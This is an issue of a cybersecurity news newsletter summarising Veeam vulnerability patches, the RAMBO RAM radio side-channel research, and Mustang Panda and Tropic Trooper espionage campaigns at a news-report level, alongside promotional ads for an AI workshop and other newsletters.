Welcome to Gone Phishing, your weekly cybersecurity newsletter that leaves cybercriminals sleeping with the phishes 🐟🐠🐡

Patch of the Week! 🩹

First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳 

Congrats to Veeam, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

Redeem Veeam 🏀

🚨 Veeam Urgently Patches 18 Security Flaws! 🐞

Veeam has released updates to fix 18 security vulnerabilities, including five critical flaws that could allow remote code execution. 

Key vulnerabilities include CVE-2024-40711 (CVSS 9.8) and CVE-2024-38650 (CVSS 9.9), affecting Veeam Backup & Replication, Veeam ONE, and Veeam Service Provider Console. Users should update to the latest versions immediately to mitigate risks, as Veeam has become a popular target for ransomware attacks. 

Notably, Rapid7 reports that Veeam was exploited in over 20% of its incident response cases in 2024! ⚠️🚀🔒

Now, on to this week’s hottest cybersecurity news stories: 

• 🔪 New RAMBO attack steals data with RAM radio signals 📻

• 🐼 Mustang Panda bamboozles Asia-Pacific govts w/ malware 👾

• 🐉 Chinese hackers target human rights studies in Middle East 🐪

They drew first blood 🔪🩸☠️

🚨 New Side-Channel Attack 'RAMBO' Exploits Radio Signals from RAM 🖥️

A novel side-channel attack named RAMBO has been uncovered, leveraging radio signals emitted by a device’s random access memory (RAM) to exfiltrate sensitive data from air-gapped networks. 

This technique was developed by Dr. Mordechai Guri, head of the Offensive Cyber Research Lab at Ben Gurion University in Israel. RAMBO uses software-generated radio signals to encode and transmit sensitive information, such as files, images, encryption keys, and biometric data, posing a significant threat to highly secure, isolated systems. 📡💾

⚙️ How RAMBO Works

The attack relies on software-defined radio (SDR) hardware and a simple antenna to intercept the transmitted radio signals from compromised devices. 

These signals can be decoded and translated back into binary information by a remote attacker, using SDR to demodulate and retrieve the exfiltrated data. 

The malware manipulates the RAM’s clock frequencies to generate electromagnetic emissions that are encoded using Manchester encoding, allowing the data to be transmitted covertly. 

This technique has been demonstrated on systems with Intel i7 3.6GHz CPUs and 16 GB RAM, achieving data exfiltration speeds of up to 1,000 bits per second. 📈🔑

👀 Exfiltration Capabilities of RAMBO

The RAMBO attack can leak various types of data, including keystrokes, documents, and biometric information. 

For example:

Keystrokes: Exfiltrated in real-time with 16 bits per key.

• RSA Encryption Keys: A 4096-bit key can be exfiltrated in about 41.96 seconds at low speeds.

• Small Files: Biometric data, images (.jpg), and documents (.txt, .docx) can be transmitted within 400 seconds at slower speeds and even faster at higher speeds.

The efficiency of RAMBO makes it capable of leaking relatively brief information over a short period, underscoring the risk it poses to air-gapped systems. 📉🗂️ 

🛡️ Potential Countermeasures

To mitigate the risk of RAMBO and similar side-channel attacks, the following countermeasures are recommended:

• Red-Black Zone Restrictions: Enforce strict separation of sensitive data and general-use zones.

• Intrusion Detection Systems (IDS): Monitor memory access at the hypervisor level.

• Radio Jammers: Deploy jamming devices to disrupt unauthorized radio communications.

• Faraday Cages: Use Faraday cages to block electromagnetic emissions from sensitive equipment.

These measures aim to minimize the attack surface and enhance the security of air-gapped networks against electromagnetic-based data exfiltration techniques. 🔒🛑

🏞️ RAMBO in the Broader Threat Landscape

RAMBO joins a growing arsenal of unconventional data exfiltration techniques targeting air-gapped networks, often viewed as the last line of defense for protecting highly sensitive information. 

As with all side-channel attacks, the initial infection vector requires the air-gapped network to be compromised, which can occur through rogue insiders, malicious USB devices, or supply chain attacks. 

Once the malware is in place, these covert channels can be activated, enabling attackers to bypass traditional network defenses and exfiltrate critical data with stealth and precision. 🚫💻

Stay vigilant and employ robust security measures to safeguard against these evolving threats.

🦾 Master AI & ChatGPT for FREE in just 3 hours 🤯

1 Million+ people have attended, and are RAVING about this AI Workshop.
Don’t believe us? Attend it for free and see it for yourself.

Save your spot here. (100 free spots only)

Highly Recommended: 🚀

Join this 3-hour Power-Packed Masterclass worth $399 for absolutely free and learn 20+ AI tools to become 10x better & faster at what you do

👉Save your seat  now (FREE for First 100)

🗓️ Tomorrow | ⏱️ 10 AM EST

In this Masterclass, you’ll learn how to:

🚀 Do quick excel analysis & make AI-powered PPTs 
🚀 Build your own personal AI assistant to save 10+ hours
🚀 Become an expert at prompting & learn 20+ AI tools
🚀 Research faster & make your life a lot simpler & more…

👉 Register here (Offer valid for First 100 people only)🎁

Asia-Pacific Governments: Slow your Mustang down 🐼🙏🎸

🚨 Mustang Panda Ups Its Game with New Malware Tools! 🛠️

The cyber threat group known as Mustang Panda (or Earth Preta) is stepping up its attacks with a refined arsenal, according to Trend Micro. Mustang Panda, active in the Asia-Pacific region, is using a variety of new tools to steal data and deliver more dangerous malware. 🌐🕵️‍♂️

🔧 Key Tools and Tactics

• PUBLOAD: A downloader linked to Mustang Panda since 2022, used to deliver the PlugX malware, and now spreading via a worm variant called HIUPAN. 🪱💾

• FDMTP & PTSOCKET: New tools introduced by PUBLOAD to enhance data exfiltration options, with FDMTP acting as a secondary control tool and PTSOCKET enabling multi-thread file transfers. 📤📊 

• DOWNBAIT & CBROVER: Part of a "fast-paced" spear-phishing campaign targeting countries like Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan. These tools help deliver further payloads like the PlugX remote access trojan (RAT). 🎯📩

📁 Data Theft

Mustang Panda is known for targeting government entities, stealing documents, spreadsheets, and presentations (.doc, .xls, .pdf, etc.) by compressing and exfiltrating them via FTP or custom programs. 🗂️🕵️‍♀️

💡 Recent Findings

Palo Alto Networks Unit 42 highlighted Mustang Panda's crafty use of Visual Studio Code's reverse shell feature, showing their ongoing evolution in attack strategies. 🖥️🔒

"Mustang Panda is rapidly advancing its techniques, making their attacks more complex and effective," say researchers. The group continues to refine its methods, including multi-stage malware chains and potentially exploiting cloud services for exfiltration. 🌩️🚀 

Stay alert! 🚨🔍

All your news. None of the bias.

Be the smartest person in the room by reading 1440! Dive into 1440, where 3.5 million readers find their daily, fact-based news fix. We navigate through 100+ sources to deliver a comprehensive roundup from every corner of the internet – politics, global events, business, and culture, all in a quick, 5-minute newsletter. It's completely free and devoid of bias or political influence, ensuring you get the facts straight.

Subscribe to 1440 today.

Oh, the humanity! 🙃

🚨 Tropic Trooper Strikes Again! 🏝️

Government entities in the Middle East and Malaysia are under attack by Tropic Trooper, a cyber threat group active since 2011, and also known as APT23, Earth Centaur, KeyBoy, and Pirate Panda. This group is notorious for targeting sectors like government, healthcare, and high-tech industries in Taiwan, Hong Kong, and the Philippines. 🖥️🛡️

🎯 New Targets

Kaspersky detected Tropic Trooper’s activity in June 2024 when they found a new version of the China Chopper web shell on a public server running the Umbraco CMS. 🐍🌐 They are now targeting critical government entities in the Middle East, particularly those focused on human rights studies, marking a strategic shift for the group. 🏛️📊

🛠️ Attack Tools

Crowdoor Malware is a variant of SparrowDoor backdoor and is deployed via .NET modules in Umbraco CMS. It acts as a loader for Cobalt Strike, maintains persistence, and harvests sensitive information. 🕵️‍♂️💻 Tropic Trooper exploits vulnerabilities in applications like Adobe ColdFusion and Microsoft Exchange Server to deliver these web shells. 🐞🔓

⚠️ Persistent Threat

Even after detection, Tropic Trooper adapted quickly, uploading new malware samples to evade security measures. 🛡️🔄 Their focus? A CMS publishing studies on human rights, specifically around the Israel-Hamas conflict—highlighting a deliberate and strategic target. 🌍✍️

Stay vigilant! 🚨🔒

That’s all for this week, folks. Take care, it’s a jungle out there 🏝️🦜🌊 🦍🐒

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

• 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

• 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

• 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!